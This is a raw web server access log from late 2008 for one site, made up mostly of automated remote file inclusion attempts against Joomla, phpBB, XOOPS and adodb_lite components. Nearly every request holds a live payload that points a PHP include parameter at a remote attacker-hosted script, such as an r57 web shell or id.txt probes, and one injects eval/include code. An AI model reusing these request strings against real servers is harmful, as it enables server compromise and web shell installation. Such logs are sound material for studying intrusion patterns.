24.132.52.239 - - [29/Nov/2008:08:43:31 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:43:36 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:43:36 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:43:49 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:43:49 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:43:49 -0800] "GET /logs/access_080502.log//newspublish/include.php?path%5Bdocroot%5D=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:43:50 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:43:50 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:44:02 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:44:27 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:08:44:39 -0800] "GET /logs/access_080831.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:08:44:40 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 94716 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:44:40 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:44:40 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:44:40 -0800] "GET /logs/access_080211.log//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:08:44:43 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 75743 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
84.234.16.214 - - [29/Nov/2008:08:44:46 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:08:44:48 -0800] "GET /logs/access_080831.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:08:44:49 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 94732 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:08:44:52 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 75743 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
84.234.16.214 - - [29/Nov/2008:08:44:52 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:44:54 -0800] "GET /modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:44:54 -0800] "GET /logs/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:44:54 -0800] "GET /logs/access_080421.log/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:44:54 -0800] "GET /logs/access_080307.log/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:08:44:54 -0800] "GET /logs/access_080530.log//joomla/index.php?option=com_restaurante&task=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:08:44:54 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:08:44:55 -0800] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:44:56 -0800] "GET /logs/access_080521.log//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:03 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:03 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:03 -0800] "GET /logs/access_080930.log%20%20//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:06 -0800] "GET /modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:06 -0800] "GET /logs/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:06 -0800] "GET /logs/access_080406.log%20%20/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:07 -0800] "GET /logs/access_080224.log%20%20/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:08:45:10 -0800] "GET /logs/access_080825.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:08:45:10 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:45:12 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:12 -0800] "GET /logs/access_080424.log%20%20//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:45:12 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.229.126.149 - - [29/Nov/2008:08:45:14 -0800] "GET /logs/access_080825.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.111.180.85 - - [29/Nov/2008:08:45:16 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:45:16 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:08:45:22 -0800] "GET /logs/access_080525.log//joomla/index.php?option=com_restaurante&task=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:45:40 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:08:45:42 -0800] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:45:53 -0800] "GET /logs/access_080530.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:45:53 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:45:54 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:54 -0800] "GET /logs/access_080421.log/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:54 -0800] "GET /logs/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:54 -0800] "GET /modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:45:56 -0800] "GET /logs/access_080307.log/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:46:10 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:46:10 -0800] "GET /logs/access_080211.log//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:46:10 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:46:12 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:46:19 -0800] "GET /logs/access_080521.log//modules/Forums/admin/admin_users.php?phpbb_root_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:08:46:21 -0800] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:46:21 -0800] "GET /logs/errors.php?error=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:46:21 -0800] "GET /errors.php?error=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:46:21 -0800] "GET /logs/access_080824.log/errors.php?error=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:08:46:21 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:46:26 -0800] "GET /logs/access_080714.log%20/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:46:26 -0800] "GET /logs/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:46:26 -0800] "GET /index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 200 94702 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:46:37 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:46:37 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:46:38 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:46:41 -0800] "GET /logs/access_081007.log/index.php?go=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:46:41 -0800] "GET /index.php?go=http://gxmag.com/poll/id????? HTTP/1.1" 200 94616 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:46:42 -0800] "GET /logs/index.php?go=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.184.234 - - [29/Nov/2008:08:47:09 -0800] "GET /logs/access_080515.log/errors.php?error=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.16 - - [29/Nov/2008:08:47:27 -0800] "GET /logs/access_080406.log//_blogadata/include/struct_admin.php?incl_page=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [29/Nov/2008:08:47:27 -0800] "GET /_blogadata/include/struct_admin.php?incl_page=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [29/Nov/2008:08:47:27 -0800] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [29/Nov/2008:08:47:28 -0800] "GET /logs/access_080829.log//_blogadata/include/struct_admin.php?incl_page=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:47:48 -0800] "GET /Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:47:48 -0800] "GET /logs/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:08:47:48 -0800] "GET /logs/access_080507.log/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:47:49 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:47:50 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:47:50 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:47:51 -0800] "GET /logs/access_080919.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:47:56 -0800] "GET /logs/access_080912.log//index.php?config=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:48:00 -0800] "GET /logs/access_080912.log//index.php?config=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:48:23 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:48:23 -0800] "GET /logs/access_080828.log/index.php?lg=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:48:24 -0800] "GET /index.php?lg=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 200 94735 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:48:24 -0800] "GET /?sourcedir=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 200 94620 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.180.85 - - [29/Nov/2008:08:48:24 -0800] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:48:24 -0800] "GET /logs/index.php?lg=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:48:29 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:48:32 -0800] "GET /_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:48:32 -0800] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:48:35 -0800] "GET /logs/access_080406.log//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.179.154 - - [29/Nov/2008:08:49:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:49:18 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.178.77 - - [29/Nov/2008:08:49:19 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:49:36 -0800] "GET /modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:49:36 -0800] "GET /logs/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:49:36 -0800] "GET /logs/access_080109.log/modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:49:40 -0800] "GET /logs/access_080829.log//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:49:45 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.241.163.249 - - [29/Nov/2008:08:50:02 -0800] "GET /logs/access_080801.log/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.241.163.249 - - [29/Nov/2008:08:50:02 -0800] "GET /logs/access_080714.log/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.241.163.249 - - [29/Nov/2008:08:50:02 -0800] "GET /logs/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.241.163.249 - - [29/Nov/2008:08:50:03 -0800] "GET /index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 200 94686 "-" "libwww-perl/5.805" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:50:08 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94850 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:50:18 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94850 "-" "libwww-perl/5.79" "www.dmulk.com"
